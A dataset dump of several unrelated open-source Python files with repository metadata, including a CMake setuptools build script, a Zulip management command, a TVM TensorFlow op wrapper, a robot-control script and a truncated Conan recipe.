from setuptools import setup, Extension
from setuptools.command.build_ext import build_ext
# Convert distutils Windows platform specifiers to CMake -A arguments
PLAT_TO_CMAKE = {
"win32": "Win32",
"win-amd64": "x64",
"win-arm32": "ARM",
"win-arm64": "ARM64",
}
# A CMakeExtension needs a sourcedir instead of a file list.
# The name must be the _single_ output extension from the CMake build.
# If you need multiple extensions, see scikit-build.
class CMakeExtension(Extension):
def __init__(self, name, sourcedir=""):
Extension.__init__(self, name, sources=[])
self.sourcedir = os.path.abspath(sourcedir)
class CMakeBuild(build_ext):
def build_extension(self, ext):
extdir = os.path.abspath(os.path.dirname(self.get_ext_fullpath(ext.name)))
# required for auto-detection of auxiliary "native" libs
if not extdir.endswith(os.path.sep):
extdir += os.path.sep
cfg = "Debug" if self.debug else "Release"
# CMake lets you override the generator - we need to check this.
# Can be set with Conda-Build, for example.
cmake_generator = os.environ.get("CMAKE_GENERATOR", "")
# Set Python_EXECUTABLE instead if you use PYBIND11_FINDPYTHON
# EXAMPLE_VERSION_INFO shows you how to pass a value into the C++ code
# from Python.
cmake_args = [
"-DCMAKE_LIBRARY_OUTPUT_DIRECTORY={}".format(extdir),
"-DPYTHON_EXECUTABLE={}".format(sys.executable),
"-DEXAMPLE_VERSION_INFO={}".format(self.distribution.get_version()),
"-DCMAKE_BUILD_TYPE={}".format(cfg), # not used on MSVC, but no harm
]
build_args = []
if self.compiler.compiler_type != "msvc":
# Using Ninja-build since it a) is available as a wheel and b)
# multithreads automatically. MSVC would require all variables be
# exported for Ninja to pick it up, which is a little tricky to do.
# Users can override the generator with CMAKE_GENERATOR in CMake
# 3.15+.
if not cmake_generator:
cmake_args += ["-GNinja"]
else:
# Single config generators are handled "normally"
single_config = any(x in cmake_generator for x in {"NMake", "Ninja"})
# CMake allows an arch-in-generator style for backward compatibility
contains_arch = any(x in cmake_generator for x in {"ARM", "Win64"})
# Specify the arch if using MSVC generator, but only if it doesn't
# contain a backward-compatibility arch spec already in the
# generator name.
if not single_config and not contains_arch:
cmake_args += ["-A", PLAT_TO_CMAKE[self.plat_name]]
# Multi-config generators have a different way to specify configs
if not single_config:
cmake_args += [
"-DCMAKE_LIBRARY_OUTPUT_DIRECTORY_{}={}".format(cfg.upper(), extdir)
]
build_args += ["--config", cfg]
# Set CMAKE_BUILD_PARALLEL_LEVEL to control the parallel build level
# across all generators.
if "CMAKE_BUILD_PARALLEL_LEVEL" not in os.environ:
# self.parallel is a Python 3 only way to set parallel jobs by hand
# using -j in the build_ext call, not supported by pip or PyPA-build.
if hasattr(self, "parallel") and self.parallel:
# CMake 3.12+ only.
build_args += ["-j{}".format(self.parallel)]
if not os.path.exists(self.build_temp):
os.makedirs(self.build_temp)
subprocess.check_call(
["cmake", ext.sourcedir] + cmake_args, cwd=self.build_temp
)
subprocess.check_call(
["cmake", "--build", "."] + build_args, cwd=self.build_temp
)
# The information here can also be placed in setup.cfg - better separation of
# logic and declaration, and simpler if you include description/version in a file.
setup(
name="ort_inference",
version="0.0.1",
author="MingYu (Ethen) Liu",
author_email="ethen8181@gmail.com",
description="CPU Inferencing with Onnxruntime",
long_description="CPU Inferencing with Onnxruntime",
ext_modules=[CMakeExtension("ort_inference")],
cmdclass={"build_ext": CMakeBuild},
zip_safe=False
)
|
[
"ethen8181@gmail.com"
] |
ethen8181@gmail.com
|
494cf359b8f1efd02f67635b8b12933e562d71b4
|
c106149cccfac8dd4f05f976253f529b3234828c
|
/zerver/management/commands/send_realm_reactivation_email.py
|
39b1dd91a654be9dba3474577f165a89b79bc915
|
[
"Apache-2.0",
"LicenseRef-scancode-free-unknown"
] |
permissive
|
kartikey54/zulip
|
cc685686af3bc1fbadc9ded260f62f45087df301
|
e8b44f491f8967823273a6d5acd3d3d376e62b90
|
refs/heads/master
| 2021-01-23T02:59:24.396882
| 2019-10-08T19:46:43
| 2019-10-08T19:46:43
| 86,029,881
| 1
| 0
|
Apache-2.0
| 2019-10-08T19:46:44
| 2017-03-24T05:16:51
|
Python
|
UTF-8
|
Python
| false
| false
| 805
|
py
|
from argparse import ArgumentParser
from zerver.lib.management import ZulipBaseCommand, CommandError
from zerver.lib.send_email import send_email, FromAddress
from zerver.lib.actions import do_send_realm_reactivation_email
from typing import Any
class Command(ZulipBaseCommand):
help = """Sends realm reactivation email to admins"""
def add_arguments(self, parser: ArgumentParser) -> None:
self.add_realm_args(parser, True)
def handle(self, *args: Any, **options: str) -> None:
realm = self.get_realm(options)
assert realm is not None
if not realm.deactivated:
raise CommandError("The realm %s is already active." % (realm.name,))
print('Sending email to admins')
do_send_realm_reactivation_email(realm)
print('Done!')
|
[
"tabbott@zulipchat.com"
] |
tabbott@zulipchat.com
|
35dfc784fce1e1f84a5c902dfaad6aa13b45a15b
|
b7f9d32bfd0ba147182a880de9b257355d3bc945
|
/pyedi/grammar/jsonnocheck.py
|
28444610964efc57bb6f31665ff2ce012f9fe561
|
[] |
no_license
|
jedrus2000/pyedi
|
25cbb930d854e0dbe79d251b3215040c978410b2
|
b5d291c5f8565137bb845835c8fe439730b2f2c7
|
refs/heads/master
| 2020-04-12T09:15:58.802275
| 2018-12-19T07:16:55
| 2018-12-19T07:16:55
| 162,396,916
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,690
|
py
|
"""
This is modified code of Bots project:
http://bots.sourceforge.net/en/index.shtml
ttp://bots.readthedocs.io
https://github.com/eppye-bots/bots
originally created by Henk-Jan Ebbers.
This code include also changes from other forks, specially from:
https://github.com/bots-edi
This project, as original Bots is licenced under GNU GENERAL PUBLIC LICENSE Version 3; for full
text: http://www.gnu.org/copyleft/gpl.html
"""
from .json import Json
class JsonNoCheck(Json):
defaultsyntax = {
"charset": "utf-8",
"checkcharsetin": "strict", # strict, ignore or botsreplace (replace with char as set in bots.ini).
"checkcharsetout": "strict", # strict, ignore or botsreplace (replace with char as set in bots.ini).
"checkunknownentities": False,
"contenttype": "application/json",
"decimaal": ".",
"defaultBOTSIDroot": "ROOT",
"envelope": "",
"indented": False, # False: output is one string (no cr/lf); True: output is indented/human readable
"merge": False,
"triad": "",
# settings needed as defaults, but not useful for this editype
"add_crlfafterrecord_sep": "",
"escape": "",
"field_sep": "",
"forcequote": 0, # csv only
"quote_char": "",
"record_sep": "",
"record_tag_sep": "", # Tradacoms/GTDI
"reserve": "",
"sfield_sep": "",
"skip_char": "",
# bots internal, never change/overwrite
"has_structure": False, # is True, read structure, recorddef, check these
"checkcollision": False,
"lengthnumericbare": False,
"stripfield_sep": False,
}
|
[
"a.barganski@gmail.com"
] |
a.barganski@gmail.com
|
28642c224abb07f03d6e3c0002d570ec3095e530
|
8eab8ab725c2132bb8d090cdb2d23a5f71945249
|
/virt/Lib/site-packages/stack_data/serializing.py
|
fb67d2906a1d42c448f6b8f99c6e470900813a01
|
[
"MIT"
] |
permissive
|
JoaoSevergnini/metalpy
|
6c88a413a82bc25edd9308b8490a76fae8dd76ca
|
c2d0098a309b6ce8c756ff840bfb53fb291747b6
|
refs/heads/main
| 2023-04-18T17:25:26.474485
| 2022-09-18T20:44:45
| 2022-09-18T20:44:45
| 474,773,752
| 3
| 1
|
MIT
| 2022-11-03T20:07:50
| 2022-03-27T22:21:01
|
Python
|
UTF-8
|
Python
| false
| false
| 6,441
|
py
|
import inspect
import logging
import sys
import traceback
from collections import Counter
from html import escape as escape_html
from types import FrameType, TracebackType
from typing import Union, Iterable, List
from stack_data import (
style_with_executing_node,
Options,
Line,
FrameInfo,
Variable,
RepeatedFrames,
)
log = logging.getLogger(__name__)
class Serializer:
def __init__(
self,
*,
options=None,
pygmented=False,
show_executing_node=True,
pygments_formatter_cls=None,
pygments_formatter_kwargs=None,
pygments_style="monokai",
executing_node_modifier="bg:#005080",
use_code_qualname=True,
strip_leading_indent=True,
html=False,
chain=True,
collapse_repeated_frames=True,
show_variables=False,
):
if options is None:
options = Options()
if pygmented and not options.pygments_formatter:
if show_executing_node:
pygments_style = style_with_executing_node(
pygments_style, executing_node_modifier
)
if pygments_formatter_cls is None:
if html:
from pygments.formatters.html import (
HtmlFormatter as pygments_formatter_cls,
)
else:
from pygments.formatters.terminal256 import (
Terminal256Formatter as pygments_formatter_cls,
)
options.pygments_formatter = pygments_formatter_cls(
style=pygments_style,
**pygments_formatter_kwargs or {},
)
self.pygmented = pygmented
self.use_code_qualname = use_code_qualname
self.strip_leading_indent = strip_leading_indent
self.html = html
self.chain = chain
self.options = options
self.collapse_repeated_frames = collapse_repeated_frames
self.show_variables = show_variables
def format_exception(self, e=None) -> List[dict]:
if e is None:
e = sys.exc_info()[1]
result = []
if self.chain:
if e.__cause__ is not None:
result = self.format_exception(e.__cause__)
result[-1]["tail"] = traceback._cause_message.strip()
elif e.__context__ is not None and not e.__suppress_context__:
result = self.format_exception(e.__context__)
result[-1]["tail"] = traceback._context_message.strip()
result.append(self.format_traceback_part(e))
return result
def format_traceback_part(self, e: BaseException) -> dict:
return dict(
frames=self.format_stack(e.__traceback__ or sys.exc_info()[2]),
exception=dict(
type=type(e).__name__,
message=traceback._some_str(e),
),
tail="",
)
def format_stack(self, frame_or_tb=None) -> List[dict]:
if frame_or_tb is None:
frame_or_tb = inspect.currentframe().f_back
return list(
self.format_stack_data(
FrameInfo.stack_data(
frame_or_tb,
self.options,
collapse_repeated_frames=self.collapse_repeated_frames,
)
)
)
def format_stack_data(
self, stack: Iterable[Union[FrameInfo, RepeatedFrames]]
) -> Iterable[dict]:
for item in stack:
if isinstance(item, FrameInfo):
if not self.should_include_frame(item):
continue
yield dict(type="frame", **self.format_frame(item))
else:
yield dict(type="repeated_frames", **self.format_repeated_frames(item))
def format_repeated_frames(self, repeated_frames: RepeatedFrames) -> dict:
counts = sorted(
Counter(repeated_frames.frame_keys).items(),
key=lambda item: (-item[1], item[0][0].co_name),
)
return dict(
frames=[
dict(
name=code.co_name,
lineno=lineno,
count=count,
)
for (code, lineno), count in counts
]
)
def format_frame(self, frame: Union[FrameInfo, FrameType, TracebackType]) -> dict:
if not isinstance(frame, FrameInfo):
frame = FrameInfo(frame, self.options)
result = dict(
name=(
frame.executing.code_qualname()
if self.use_code_qualname
else frame.code.co_name
),
filename=frame.filename,
lineno=frame.lineno,
lines=list(self.format_lines(frame.lines)),
)
if self.show_variables:
result["variables"] = list(self.format_variables(frame))
return result
def format_lines(self, lines):
for line in lines:
if isinstance(line, Line):
yield dict(type="line", **self.format_line(line))
else:
yield dict(type="line_gap")
def format_line(self, line: Line) -> dict:
return dict(
is_current=line.is_current,
lineno=line.lineno,
text=line.render(
pygmented=self.pygmented,
escape_html=self.html,
strip_leading_indent=self.strip_leading_indent,
),
)
def format_variables(self, frame_info: FrameInfo) -> Iterable[dict]:
try:
for var in sorted(frame_info.variables, key=lambda v: v.name):
yield self.format_variable(var)
except Exception: # pragma: no cover
log.exception("Error in getting frame variables")
def format_variable(self, var: Variable) -> dict:
return dict(
name=self.format_variable_part(var.name),
value=self.format_variable_part(self.format_variable_value(var.value)),
)
def format_variable_part(self, text):
if self.html:
return escape_html(text)
else:
return text
def format_variable_value(self, value) -> str:
return repr(value)
def should_include_frame(self, frame_info: FrameInfo) -> bool:
return True # pragma: no cover
|
[
"joao.a.severgnini@gmail.com"
] |
joao.a.severgnini@gmail.com
|
e0ac24619a342a1b4cf7f9e015cbbcec4a3161d4
|
c9b5f49906e213c0c6edd25c063961b8226b67af
|
/compression/evaluate.py
|
a6d3d4e3f36ec271fc6ec3957c65c952d9ea8164
|
[] |
no_license
|
danielzgsilva/jetson_projects
|
c481ff505c97ac40089438f34ae24b74e265631c
|
72ab79a2d4759fe51d107432aa9ff6ce2c728a53
|
refs/heads/master
| 2023-01-20T20:22:04.410741
| 2020-12-01T21:31:07
| 2020-12-01T21:31:07
| 294,460,502
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,723
|
py
|
import os
#os.environ['CUDA_LAUNCH_BLOCKING']='1'
import config
import torch
import numpy as np
from dataloader import TrainDataset, ValidationDataset, DataLoader, get_cifar100_dataset
from model import VGGModel, VGGModel_old
import time
from basisModel import basisModel, display_stats
from options import Options
opts = Options().parse()
if opts.tensorRT:
from torch2trt import torch2trt
def get_accuracy(y_pred, y):
y_argmax = torch.argmax(y_pred, -1)
return torch.mean((y_argmax==y).type(torch.float))
def validation(model, data_loader, opts):
model.eval()
if opts.compress:
print('Compressing model with basis filter algorithm, compression factor of {}'.format(opts.compress_factor))
model = basisModel(model, opts.use_weights, opts.add_bn, opts.fixed_basbs)
model.update_channels(opts.compress_factor)
display_stats(model, (64,64))
else:
print('No compression schema')
if config.use_cuda:
model.cuda()
if opts.tensorRT:
print('Optimizing model with TensorRT')
# Get random input to pass as a sample to TensorRT
x, _ = next(iter(data_loader))
if config.use_cuda:
x = x.cuda()
else:
raise RuntimeError('Cannot use TensorRT without CUDA')
# Optimize
trt_model = torch2trt(model, [x], max_batch_size=config.batch_size)
del model
del x
torch.cuda.empty_cache()
model = trt_model
model.cuda()
else:
print('No TensorRT')
print('memory usage:')
print(torch.cuda.memory_allocated())
print(torch.cuda.memory_summary())
print('Evaluating model with {} iterations over {} images'.format(opts.n, len(data_loader)*config.batch_size))
all_times, all_accs = [], []
for i in range(opts.n):
times, accs = [], []
for _, sample in enumerate(data_loader):
x, y = sample
if config.use_cuda:
x = x.cuda()
y = y.cuda()
with torch.no_grad():
start_time = time.time()
y_pred = model(x)
end_time = time.time()
times.append((end_time-start_time)/float(x.shape[0]) * 1000 * 1000) # saves the average time per image
acc = get_accuracy(y_pred, y) # computes the accuracy per batch
accs.append(acc.item())
iteration_time, iteration_acc = float(np.mean(times)), float(np.mean(accs))*100
all_times.append(iteration_time)
all_accs.append(iteration_acc)
print('Iteration %d: Avg Time per Image: %.4f (micro-sec) Accuracy: %.4f' % (i, iteration_time, iteration_acc), flush=True)
avg_time, avg_acc = float(np.mean(all_times[1:])), float(np.mean(all_accs))
print('-'*70)
print('Final reuslts: Avg Time per Image: %.4f (micro-sec) Accuracy: %.4f' % (avg_time, avg_acc), flush=True)
return avg_time, avg_acc
def evaluate(opts):
val_dataset = get_cifar100_dataset('./data/', False, download=True)
val_dataloader = DataLoader(val_dataset, batch_size=config.batch_size, shuffle=False, num_workers=config.workers)
save_file_path = os.path.join(opts.save_dir, opts.model)
if opts.load_state_dict:
if opts.use_vgg_old:
model = VGGModel_old(n_classes=config.n_classes)
else:
model = VGGModel(n_classes=config.n_classes)
model.load_state_dict(torch.load(save_file_path)['state_dict'])
else:
model = torch.load(save_file_path)
avg_time, avg_acc = validation(model, val_dataloader, opts)
if __name__ == '__main__':
evaluate(opts)
|
[
"danielzgsilva@knights.ucf.edu"
] |
danielzgsilva@knights.ucf.edu
|
fb588a29ad13110bfe5be22b2eca5aff80ed72bc
|
51bab842d885e6d5e6dc0892522ed8ce82f2be9d
|
/src/picktrue/sites/abstract.py
|
ca470e6512e31356d37569ab9e178342d9c4e097
|
[
"MIT"
] |
permissive
|
winkidney/PickTrue
|
d941e5e9eb420f4a80bd0bbe1c06a0ab8ff3c861
|
772b105e4de3852bba41369221f47b8480bf1070
|
refs/heads/master
| 2023-03-12T01:40:54.780845
| 2023-03-10T17:23:55
| 2023-03-10T17:23:55
| 144,246,340
| 146
| 16
|
MIT
| 2020-07-24T13:02:24
| 2018-08-10T06:32:10
|
Python
|
UTF-8
|
Python
| false
| false
| 2,353
|
py
|
import os
from pathlib import Path
import requests
from picktrue.meta import UA, ImageItem
from picktrue.utils import retry
def normalize_proxy_string(proxy):
if 'socks5' in proxy:
if 'socks5h' not in proxy:
proxy = proxy.replace('socks5', 'socks5h')
return proxy
def get_proxy(proxy_string=None):
if proxy_string is None:
return {}
proxy = normalize_proxy_string(proxy_string)
proxies = {
'proxies': {
'http': proxy,
'https': proxy,
}
}
return proxies
class DummySite:
@property
def dir_name(self):
raise NotImplementedError()
@property
def fetcher(self):
raise NotImplementedError()
@property
def tasks(self):
raise NotImplementedError()
class DummyFetcher:
def __init__(self, proxies=None):
self.session = requests.session()
if proxies is not None:
self.session.proxies = proxies
self.session.headers.update(UA)
@staticmethod
def _safe_name(name):
name = name.replace("/", " ")
name = name.replace("\\", " ")
name = name.strip()
name = name.replace(" ", '-')
return name
@staticmethod
def _safe_path(path):
return Path(path).absolute()
@retry()
def get(self, url, **kwargs):
"""
:rtype: requests.Response
"""
if 'timeout' in kwargs:
kwargs.pop('timeout')
return self.session.get(url, timeout=(2, 30), **kwargs)
def get_save_path(self, base_path, image_name, image: ImageItem):
save_path = os.path.join(
base_path,
image_name,
)
return save_path
def save(self, content, task_item):
"""
:type content: bytearray
:type task_item: picktrue.meta.TaskItem
"""
image = task_item.image
image_name = image.name
if callable(image.name):
image_name = image.name(image.url, content)
save_path = self.get_save_path(
task_item.base_save_path,
image_name,
image,
)
save_path = self._safe_path(save_path)
if os.path.exists(save_path):
return
with open(save_path, "wb") as f:
f.write(content)
f.flush()
|
[
"winkidney@gmail.com"
] |
winkidney@gmail.com
|
f07fecfbe41fa6f5a0d071a0779023ddd9a066ad
|
43268854505070471e0911bc0e5b280cadec8601
|
/modeller9v8/examples/commands/all_hydrogen.py
|
277f74f956357eaf0efaf2fe95d7ea9c4afac96a
|
[] |
no_license
|
realbigws/From_CA_to_FullAtom
|
08621bf350c77e29140051d1af850a51e5fe138f
|
a59d9fcbc6c1f2bfc5fc2d77da26318c63ac3052
|
refs/heads/master
| 2020-05-30T01:37:47.378404
| 2019-05-30T21:42:45
| 2019-05-30T21:42:45
| 189,481,583
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 955
|
py
|
# This will read a specified atom file, generate all hydrogen atoms,
# add atomic radii and charges, and write the model to a PDB file in
# the GRASP format. This can be used with GRASP to display electrostatic
# properties without assigning charges and radii in GRASP.
from modeller import *
from modeller.scripts import complete_pdb
log.verbose()
env = environ()
env.io.atom_files_directory = ['../atom_files']
env.libs.topology.read(file='$(LIB)/top_allh.lib')
env.libs.parameters.read(file='$(LIB)/par.lib')
def patch_disulfides(mdl):
"""Patch topology to remove sulfhydril hydrogens"""
for ids in [ ('17', '39'),
( '3', '22'),
('53', '59'),
('41', '52') ]:
mdl.patch(residue_type='DISU', residues=[mdl.residues[r] for r in ids])
mdl = complete_pdb(env, "1fas", patch_disulfides)
mdl.write(file='1fas.ini1', model_format='GRASP')
mdl.write(file='1fas.ini2', model_format='PDB')
|
[
"wangsheng@ttic.edu"
] |
wangsheng@ttic.edu
|
5a11112058ae007b6764e25e44cccde6c87c2df1
|
77ab593ed55a6d46b1778f6d41bc70ced3f8cd46
|
/face_into/face72/see_data.py
|
f713bea53d21afcdad492cd716761cea8e41e100
|
[] |
no_license
|
wosxcc/bot
|
e93b92fbca79a915feb186160f3f72c99218ffcb
|
c097f5455bc6264c9f778fb72900475963836153
|
refs/heads/master
| 2021-06-12T12:43:47.314071
| 2018-12-14T08:51:43
| 2018-12-14T08:51:43
| 128,619,488
| 7
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,321
|
py
|
import os
import cv2 as cv
path_files = 'E:/dectect/dectect/face68'
for file in os.listdir(path_files):
if (file[-4:]=='.txt'):
print(file)
img = cv.imread(path_files+'/' + file[:-4]+'.jpg')
txt_open = open(path_files+'/' + file)
txt_read = txt_open.read()
txt_lines =txt_read.split(' ')
txt_float = [float(i) for i in txt_lines]
biaoq= 'xiao'
if txt_float[0]==0:
biaoq='buxiao'
elif txt_float[0]==2:
biaoq='daxiao'
biaoq += str(txt_float[1])
img = cv.putText(img, biaoq, (0, 25), 2, cv.FONT_HERSHEY_PLAIN, (255, 0, 0))
for x in range(int(len(txt_float)/2)-1):
img=cv.circle(img,(int(txt_float[2 + x * 2]*img.shape[1]),int(txt_float[2 + x * 2 + 1]*img.shape[0])),1,(0,255,0),-1)
cv.imshow('img', img)
txt_open.close()
k = cv.waitKey(0) & 0xFF
if k == ord('d'):
os.remove(path_files + '/' + file)
os.remove(path_files + '/' + file[:-4] + '.jpg')
print('删除成功', path_files + '/' + file)
elif k == ord('e'):
os.remove(last_img)
os.remove(last_img[:-4] + '.jpg')
print('删除前一张', last_img)
else:
last_img = path_files + '/' + file
|
[
"821022156@qq.com"
] |
821022156@qq.com
|
ed202550c399b038c7bfb0bf2e966d9f0662b5d4
|
2d05050d0ada29f7680b4df20c10bb85b0530e45
|
/python/tvm/contrib/tf_op/module.py
|
bcff2741630c5308254ab8df9ed28a5875b956ff
|
[
"Apache-2.0",
"BSD-3-Clause",
"MIT",
"LicenseRef-scancode-unknown-license-reference",
"Unlicense",
"Zlib",
"LLVM-exception",
"BSD-2-Clause"
] |
permissive
|
apache/tvm
|
87cb617f9a131fa44e1693303aaddf70e7a4c403
|
d75083cd97ede706338ab413dbc964009456d01b
|
refs/heads/main
| 2023-09-04T11:24:26.263032
| 2023-09-04T07:26:00
| 2023-09-04T07:26:00
| 70,746,484
| 4,575
| 1,903
|
Apache-2.0
| 2023-09-14T19:06:33
| 2016-10-12T22:20:28
|
Python
|
UTF-8
|
Python
| false
| false
| 4,901
|
py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Module container of TensorFlow TVMDSO op"""
import tensorflow as tf
from tensorflow.python.framework import load_library
from tensorflow.python import platform
class OpModule:
"""Module container of TensorFlow TVMDSO op which wraps exported
TVM op implementation library to be called on TensorFlow side"""
def __init__(self, lib_path):
self.lib_path = lib_path
def func(self, name, output_dtype=None, output_shape=None):
"""Get tvm op function wrapped as TensorFlow tensor to tensor function
Parameters
----------
name: str
function name
output_dtype: str or TensorFlow datatype
Output datatype, default is float32
output_shape: List of integer/tf scalar tensor or tf shape tensor
Output shape, default the same with first input's shape
Returns
----------
Func object that acts as TensorFlow tensor to tensor function.
"""
return TensorFunc(self.lib_path, name, output_dtype, output_shape)
def __getitem__(self, func_name):
return self.func(func_name)
class TensorFunc:
"""Function object that acts as TensorFlow tensor to tensor function."""
def __init__(self, lib_path, func_name, output_dtype, output_shape):
self.lib_path = lib_path
self.func_name = func_name
self.output_dtype = output_dtype
# const(0) indicate invalid dynamic shape
self.dynamic_output_shape = tf.constant(0, tf.int64)
self.static_output_shape = None
self.has_static_output_shape = False # extra flag is required
if self._is_static_shape(output_shape):
self.static_output_shape = output_shape
self.has_static_output_shape = True
elif output_shape is not None:
self.dynamic_output_shape = self._pack_shape_tensor(output_shape)
self.module = self._load_platform_specific_library("libtvm_dso_op")
self.tvm_dso_op = self.module.tvm_dso_op
def apply(self, *params):
return self.tvm_dso_op(
params,
dynamic_output_shape=self.dynamic_output_shape,
static_output_shape=self.static_output_shape,
has_static_output_shape=self.has_static_output_shape,
lib_path=self.lib_path,
func_name=self.func_name,
output_dtype=self.output_dtype,
)
def __call__(self, *params):
return self.apply(*params)
def _load_platform_specific_library(self, lib_name):
system = platform.system()
if system == "Darwin":
lib_file_name = lib_name + ".dylib"
elif system == "Windows":
lib_file_name = lib_name + ".dll"
else:
lib_file_name = lib_name + ".so"
return load_library.load_op_library(lib_file_name)
def _is_static_shape(self, shape):
if shape is None or not isinstance(shape, list):
return False
for dim_value in shape:
if not isinstance(dim_value, int):
return False
if dim_value < 0:
raise Exception(f"Negative dimension is illegal: {dim_value}")
return True
def _pack_shape_tensor(self, shape):
if isinstance(shape, tf.Tensor):
if shape.dtype == tf.int32:
shape = tf.cast(shape, tf.int64)
elif isinstance(shape, list):
shape_dims = []
for dim_value in shape:
if isinstance(dim_value, int):
shape_dims.append(tf.constant(dim_value, tf.int64))
elif isinstance(dim_value, tf.Tensor) and dim_value.shape.rank == 0:
if dim_value.dtype == tf.int32:
dim_value = tf.cast(dim_value, tf.int64)
shape_dims.append(dim_value)
else:
raise TypeError("Input shape dimension is neither scalar tensor nor int")
shape = tf.stack(shape_dims)
else:
raise TypeError("Input shape is neither tensor nor list")
return shape
|
[
"noreply@github.com"
] |
apache.noreply@github.com
|
03e2d01099f8601a427ced9e76c0efe84bdc6d95
|
947af25b72b5b3037443fae3fb22fa3a2f1de363
|
/nextgisweb_mapserver/mapfile/keyword_tests.py
|
8857613f74b6be20b27ab8cb8421416a1f7d64c7
|
[] |
no_license
|
guardeivid/nextgisweb_mapserver
|
2b527b160b6cb017ae9c6a663e4171783a9c89d2
|
34376442fe6d56794c32523050ceb338a902228f
|
refs/heads/master
| 2020-03-30T02:50:50.893436
| 2014-04-14T09:19:49
| 2014-04-14T09:19:49
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 528
|
py
|
# -*- coding: utf-8 -*-
from lxml.etree import tostring, fromstring, RelaxNG
from .keyword import registry
def _test_shema(cls):
root = cls.element_schema()
root.set('datatypeLibrary', 'http://www.w3.org/2001/XMLSchema-datatypes')
xml = tostring(root, pretty_print=True)
idx = 1
print ''
for s in xml.split('\n'):
print "%03d: %s" % (idx, s)
idx += 1
print ''
RelaxNG(fromstring(xml))
def test_schema():
for directive in registry:
yield _test_shema, directive
|
[
"me@dezhin.net"
] |
me@dezhin.net
|
7f5d989cb77b8fbbb53231f3820afe5b56fbe207
|
18f0ad99e21e2e35126f8c3c28079d358fa2129a
|
/SnakeBot/buzzer/code.py
|
6488f15e023e6bf5709d147c707884478c919297
|
[
"MIT"
] |
permissive
|
ladyada/Adafruit_Learning_System_Guides
|
9bf18dfa35941e0cbecbb3c2d02b4fa3cb79744f
|
6d76801878cbf65132ccea950dc47ae842c73dcd
|
refs/heads/master
| 2023-08-20T20:30:42.910576
| 2022-01-10T20:28:11
| 2022-01-10T20:28:11
| 115,837,894
| 13
| 2
|
MIT
| 2020-03-31T23:23:45
| 2017-12-31T02:34:47
|
C
|
UTF-8
|
Python
| false
| false
| 2,930
|
py
|
import time
import random
from adafruit_crickit import crickit
LEFT = False
RIGHT = True
random.seed(int(time.monotonic()))
ss = crickit.seesaw
left_wheel = crickit.dc_motor_1
right_wheel = crickit.dc_motor_2
RIGHT_BUMPER = crickit.SIGNAL1
LEFT_BUMPER = crickit.SIGNAL2
CENTER_BUMPER = crickit.SIGNAL3
ss.pin_mode(RIGHT_BUMPER, ss.INPUT_PULLUP)
ss.pin_mode(LEFT_BUMPER, ss.INPUT_PULLUP)
ss.pin_mode(CENTER_BUMPER, ss.INPUT_PULLUP)
# These allow easy correction for motor speed variation.
# Factors are determined by observation and fiddling.
# Start with both having a factor of 1.0 (i.e. none) and
# adjust until the bot goes more or less straight
def set_right(speed):
right_wheel.throttle = speed * 0.9
def set_left(speed):
left_wheel.throttle = speed
# Uncomment this to find the above factors
# set_right(1.0)
# set_left(1.0)
# while True:
# pass
# Check for bumper activation and move away accordingly
# Returns False if we got clear, True if we gave up
def react_to_bumpers():
attempt_count = 0
# keep trying to back away and turn until we're free
while True:
# give up after 3 tries
if attempt_count == 3:
return True
bumped_left = not ss.digital_read(LEFT_BUMPER)
bumped_right = not ss.digital_read(RIGHT_BUMPER)
bumped_center = not ss.digital_read(CENTER_BUMPER)
# Didn't bump into anything, we're done here
if not bumped_left and not bumped_right and not bumped_center:
return False
# If the middle bumper was triggered, randomly pick a way to turn
if bumped_center:
bumped_left |= random.randrange(10) < 5
bumped_right = not bumped_left
# Back away a bit
set_left(-0.5)
set_right(-0.5)
time.sleep(0.5)
# If we bumped on the left, turn to the right
if bumped_left:
set_left(1.0)
set_right(0.0)
# If we bumped on the right, turn left
elif bumped_right:
set_left(0.0)
set_right(1.0)
# time to turn for
time.sleep(random.choice([0.2, 0.3, 0.4]))
attempt_count += 1
def tack(direction, duration):
target_time = time.monotonic() + duration
if direction == LEFT:
set_left(0.25)
set_right(1.0)
else:
set_left(1.0)
set_right(0.25)
while time.monotonic() < target_time:
if not(ss.digital_read(LEFT_BUMPER) and
ss.digital_read(RIGHT_BUMPER) and
ss.digital_read(CENTER_BUMPER)):
return react_to_bumpers()
return False
while True:
if tack(LEFT, 0.75):
break
if tack(RIGHT, 0.75):
break
set_left(0)
set_right(0)
while True:
for _ in range(3):
crickit.drive_2.fraction = 1.0
time.sleep(0.1)
crickit.drive_2.fraction = 0.0
time.sleep(.2)
time.sleep(10.0)
|
[
"dastels@daveastels.com"
] |
dastels@daveastels.com
|
d5a2f49110fd363deb27708c646b22143667b47c
|
5e381364c2ab31ff3618369085afffba6caa8edb
|
/recipes/xtr/all/conanfile.py
|
e4caa905f0a2d8e333cbaa86e7345766dda819a1
|
[
"MIT"
] |
permissive
|
CAMOBAP/conan-center-index
|
16aea68a6d22da22831ba985773125e8eda08f00
|
67d57532bdad549fef3fa6cb8fcdfa86bc55e4f1
|
refs/heads/master
| 2023-07-30T08:58:57.285571
| 2021-10-02T14:57:54
| 2021-10-02T14:57:54
| 323,262,699
| 1
| 0
|
MIT
| 2021-05-29T13:37:04
| 2020-12-21T07:30:02
|
Python
|
UTF-8
|
Python
| false
| false
| 3,685
|
py
|
from conans import ConanFile, AutoToolsBuildEnvironment, tools
from conans.errors import ConanInvalidConfiguration
import os
class XtrConan(ConanFile):
name = "xtr"
description = \
"C++ Logging Library for Low-latency or Real-time Environments"
topics = ("xtr", "logging", "logger")
url = "https://github.com/conan-io/conan-center-index"
homepage = "https://github.com/choll/xtr"
license = "MIT"
settings = "os", "arch", "compiler", "build_type"
options = {
"fPIC": [True, False],
"enable_exceptions": [True, False],
"enable_lto": [True, False],
}
default_options = {
